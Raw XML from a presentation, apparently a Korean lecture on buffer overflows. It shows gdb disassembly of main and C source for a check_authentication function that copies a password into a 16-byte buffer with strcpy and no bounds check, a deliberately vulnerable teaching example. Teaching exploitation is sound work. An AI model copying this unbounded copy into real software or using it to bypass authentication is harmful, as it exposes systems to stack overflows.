              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1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0x08048519 &lt;+0&gt;:	push   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0x0804851a &lt;+1&gt;:	mov    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0x0804851c &lt;+3&gt;:	sub    $0x8,%esp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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x0804851f &lt;+6&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cmpl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x1,0x8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> 		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>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b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x08048547 &lt;+46&gt;:	mov    0xc(%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0x0804854a &lt;+49&gt;:	add    $0x4,%eax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0x0804854d &lt;+52&gt;:	mov    (%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0x0804854f &lt;+54&gt;:	mov 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,(%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0x08048552 &lt;+57&gt;:	call   0x8048474 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>check_authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;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0x08048557 &lt;+62&gt;:	test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ko-KR" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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ko-KR" altLang="ko-KR" sz="2500" b="1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7" y="565804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506607" y="435892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B08799-3689-3C45-A8D2-C5D09121E9DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621516" y="486837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60A34-4EBF-BD4A-AFE9-415A183E5AF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621515" y="421881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69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8" y="690509"/>
            <a:ext cx="8923283" cy="6467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500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1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0x08048519 &lt;+0&gt;:	push   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0x0804851a &lt;+1&gt;:	mov    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0x0804851c &lt;+3&gt;:	sub    $0x8,%esp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0x0804851f &lt;+6&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cmpl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x1,0x8(%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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x08048523 &lt;+10&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>jg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>     0x8048547 &lt;main+46&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0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0x08048547 &lt;+46&gt;:	mov    0xc(%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0x0804854a &lt;+49&gt;:	add    $0x4,%eax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0x0804854d &lt;+52&gt;:	mov    (%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0x0804854f &lt;+54&gt;:	mov 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,(%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0x08048552 &lt;+57&gt;:	call   0x8048474 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>check_authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;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0x08048557 &lt;+62&gt;:	test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ko-KR" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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ko-KR" altLang="ko-KR" sz="2500" b="1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7" y="565804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506607" y="435892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B08799-3689-3C45-A8D2-C5D09121E9DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621516" y="486837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60A34-4EBF-BD4A-AFE9-415A183E5AF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621515" y="4218811"/>
            <a:ext cx="2648607" cy="649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F3146-EB50-CD4A-9C13-991EC4E552B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10631214" y="1657766"/>
            <a:ext cx="1560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1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Monaco" pitchFamily="2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4C44C02-30E7-3344-9364-9A0CA7EE4955}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8544910" y="2211764"/>
            <a:ext cx="0" cy="190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C6F5CE-635E-2248-B06D-49A8B815C7C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8529145" y="2211764"/>
            <a:ext cx="21020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67AB80-DEFB-4243-A450-A31D20F06DCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6321980" y="159880"/>
            <a:ext cx="5870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err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>jg</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="3000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> (jump greater) : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="3000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="3000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="3000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>a,b</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="3000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>에서</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="3000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> a</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>가 클 때 점프</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38601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7693570" cy="6467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  0x08048519 &lt;+0&gt;:	push   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0x0804851a &lt;+1&gt;:	mov    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0x0804851c &lt;+3&gt;:	sub    $0x8,%esp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0x0804851f &lt;+6&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cmpl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x1,0x8(%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0x08048523 &lt;+10&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>jg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>     0x8048547 &lt;main+46&gt;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  <a:endParaRPr lang="en-US" altLang="ko-KR" sz="30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onaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   0x08048547 &lt;+46&gt;:	mov    0xc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax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onaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   0x0804854a &lt;+49&gt;:	add    $0x4,%eax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0x0804854d &lt;+52&gt;:	mov    (%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0x0804854f &lt;+54&gt;:	mov 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,(%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0x08048552 &lt;+57&gt;:	call   0x8048474 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>check_authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;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0x08048557 &lt;+62&gt;:	test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ko-KR" altLang="ko-KR" sz="1500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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7" y="565804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506607" y="435892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B08799-3689-3C45-A8D2-C5D09121E9DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621516" y="486837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60A34-4EBF-BD4A-AFE9-415A183E5AF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621515" y="421881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호 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F798BBA7-63C8-B24B-96F2-856CF190C5B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1939917">
            <a:off x="6211610" y="3375897"/>
            <a:ext cx="819807" cy="92992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68C8A68-E6A4-C846-BA0E-9B5B6AF8726A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7047186" y="1024759"/>
            <a:ext cx="1852448" cy="2632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365537-5BB6-3545-942E-3CE4F268D9EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10287000" y="409903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err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="3000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Monac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CB35-B53B-0A49-8D6A-3DF87912E169}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8899634" y="470761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5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D11E7-40E8-F94D-8771-42A955EF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"/>
            <a:ext cx="10515600" cy="6748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#include&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;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#include&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>stdlib.h</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;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#include&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;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int </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>check_authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(char *password){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int </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>auth_flag</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = 0;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char </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>password_buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[16];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>password_buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, password);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000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if(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>strcmp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>password_buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, "brillig") == 0)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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>auth_flag</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000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if(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>strcmp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>password_buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, "</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>outgrabe</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>") == 0)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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>auth_flag</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000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return </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>auth_flag</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>;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825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8355724" cy="6467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  0x08048519 &lt;+0&gt;:	push   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0x0804851a &lt;+1&gt;:	mov    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0x0804851c &lt;+3&gt;:	sub    $0x8,%esp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0x0804851f &lt;+6&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cmpl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x1,0x8(%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0x08048523 &lt;+10&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>jg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>     0x8048547 &lt;main+46&gt;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  <a:endParaRPr lang="en-US" altLang="ko-KR" sz="30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onaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x08048547 &lt;+46&gt;:	mov    0xc(%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0x0804854a &lt;+49&gt;:	add    $0x4,%eax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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x0804854d &lt;+52&gt;:	mov (%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2500" b="1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0x0804854f &lt;+54&gt;:	mov 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,(%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0x08048552 &lt;+57&gt;:	call   0x8048474 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>check_authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;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0x08048557 &lt;+62&gt;:	test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ko-KR" altLang="ko-KR" sz="1500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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7" y="565804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506607" y="435892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B08799-3689-3C45-A8D2-C5D09121E9DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621516" y="486837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60A34-4EBF-BD4A-AFE9-415A183E5AF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621515" y="421881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호 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F798BBA7-63C8-B24B-96F2-856CF190C5B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1939917">
            <a:off x="6211610" y="3375897"/>
            <a:ext cx="819807" cy="92992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68C8A68-E6A4-C846-BA0E-9B5B6AF8726A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
